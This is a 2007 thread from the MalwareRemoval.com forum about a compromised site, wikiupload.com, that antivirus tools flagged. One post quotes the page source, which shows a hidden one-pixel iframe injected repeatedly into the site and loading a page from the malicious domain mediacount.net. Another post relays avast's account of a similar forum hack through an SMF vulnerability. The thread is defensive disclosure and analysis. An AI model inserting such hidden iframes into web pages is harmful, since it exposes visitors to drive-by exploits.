Welcome to MalwareRemoval.com,
What if we told you that you could get malware removal help from experts, and that it was 100% free? MalwareRemoval.com provides free support for people with infected computers. Our help, and the tools we use are always 100% free. No hidden catch. We simply enjoy helping others. You enjoy a clean, safe computer.

Malware Removal Instructions

Trojan at http://www.wikiupload.com/index.php

Notifications for Security Updates, as well as News and Information from across the web - mostly security minded.

Update Contributors: Members of the Malware Removal University.

Trojan at http://www.wikiupload.com/index.php

Unread postby elfcupid » October 8th, 2007, 10:47 am

Sorry if I make a post in wrong place.

I just want to let you know that there is a trojan in http://www.wikiupload.com/index.php .

I have checked again and again and Norton warns me whenever I go to that page.

I also asked one of my friends who use Kaspersky to go there. He also found a warning note by his Kapersky.
elfcupid
Active Member
 
Posts: 3
Joined: September 4th, 2007, 9:01 am
Advertisement
Register to Remove

Unread postby elfcupid » October 8th, 2007, 10:48 am

Bump.
elfcupid
Active Member
 
Posts: 3
Joined: September 4th, 2007, 9:01 am

Unread postby Nick-YF19 » October 8th, 2007, 11:24 pm

Interesting. I had NOD32 detect S/Exploit.ADODB.Stream.AC Trojan when I visited. I'll take look into this, but if Norton flagged something, then you should be OK. I sent a test machine there that was unprotected and nothing happened.
User avatar
Nick-YF19
Admin/Teacher Emeritus
 
Posts: 4036
Joined: May 17th, 2005, 12:42 am
Location: California

Unread postby suzi » October 8th, 2007, 11:57 pm

elfcupid,

It looks to me like the site has been hacked, assuming wikiupload.com is not ordinarily a malicous site. I checked the source code of the page and it shows this:

Code: Select all
      <td><a href='ordinary_page.php?id=5'><span class="menu_small">About us</a> <iframe src='http://mediacount.net/adv/newnew.php?adv=56' width=1 height=0></iframe><if</span></a></td></tr> 
          <tr> 
            <td><a href='ordinary_page.php?id=5'><span class="menu_small">About us</a> <iframe src='http://mediacount.net/adv/newnew.php?adv=56' width=1 height=0></iframe><if</span></a></td></tr> 
          <tr> 
            <td><a href='ordinary_page.php?id=5'><span class="menu_small">About us</a> <iframe src='http://mediacount.net/adv/newnew.php?adv=56' width=1 height=0></iframe><if</span></a></td></tr> 
          <tr> 
            <td><a href='ordinary_page.php?id=5'><span class="menu_small">About us</a> <iframe src='http://mediacount.net/adv/newnew.php?adv=56' width=1 height=0></iframe><if</span></a></td></tr> 
          <tr> 
            <td><a href='ordinary_page.php?id=5'><span class="menu_small">About us</a> <iframe src='http://mediacount.net/adv/newnew.php?adv=56' width=1 height=0></iframe><if</span></a></td></tr> 
</table>


mediacount.net is a known malicious domain.

http://www.google.com/search?hl=en&q=me ... gle+Search
User avatar
suzi
Visiting Staff
 
Posts: 220
Joined: March 12th, 2005, 6:06 pm

Unread postby ChrisRLG » October 9th, 2007, 6:26 am

yep it tried to install to my machine as well - AVG7 caught it dead.
ChrisRLG
Administrator Emeritus
 
Posts: 17759
Joined: December 16th, 2004, 10:04 am
Location: Southend, Essex, UK

Unread postby lightbug » October 12th, 2007, 1:34 am

This is exactly what happened at the avast! support forum with the mediacount.net and such. The Alwil staff were able to fix the problem but it did cause grieve for the users who got infected by the exploit (luckily avast! was able to detect the trojan).
:(
User avatar
lightbug
Regular Member
 
Posts: 19
Joined: October 6th, 2007, 9:17 pm

Unread postby suzi » October 12th, 2007, 1:36 am

I thought it might be similar to the attack on Avast. Did they ever figure how how the forum got hacked? Or what happened?
User avatar
suzi
Visiting Staff
 
Posts: 220
Joined: March 12th, 2005, 6:06 pm

Unread postby lightbug » October 12th, 2007, 1:42 am

Hi suzi,

This is what Vlk said regarding about the exploit original source:

1. The attacker used a vulnerability in SMF version 1.1.12 (the forum software that was in use when it happened).

2. The attack was led from Russia

3. The attack consisted in adding an iframe to each and every page of the forum. The iframe led to a remote site.

4. The remote site hosted an exploit for IE and an exploit for Firefox (both benign if an up-to-date version of the browser was used).

5. Avast was able to block the IE exploit directly, and also blocked the EXE that was downloaded by means of the Firefox exploit

6. This suggests that it was not a targeted attack (specific to avast forum) - it would be hard to believe that the attacker wouldn't have checked that the malware was undetected by avast

7. It took us about 12 hours to clean the forum and restore it to the original state (Saturday August 26). We also upgraded the forum software to the latest version (which has the vulnerability fixed). Unfortunately, the initial cleaning attempt wasn't perfect so the attacker, in a much smaller extent, was able to carry out another attack a couple of days later. This time, it was quite an easy (and quick) "fix", though.

8. No data was lost from the forum database

9. It is hard to say if the attacker stole any data from the database. It seems unlikely, but unfortunately, it cannot be guaranteed. That would mean mainly the email addresses (the passwords are not stored in the db - just their hashes).

10. It was a good lesson for us. We apologize for any inconveniences this might have caused to you.

Cheers
Vlk
User avatar
lightbug
Regular Member
 
Posts: 19
Joined: October 6th, 2007, 9:17 pm
Advertisement
Register to Remove


  • Similar Topics
    Replies
    Views
    Last post

Return to News Desk



Who is online

Users browsing this forum: No registered users and 13 guests

Contact us:

Advertisements do not imply our endorsement of that product or service. Register to remove all ads. The forum is run by volunteers who donate their time and expertise. We make every attempt to ensure that the help and advice posted is accurate and will not cause harm to your computer. However, we do not guarantee that they are accurate and they are to be used at your own risk. All trademarks are the property of their respective owners.

Member site: UNITE Against Malware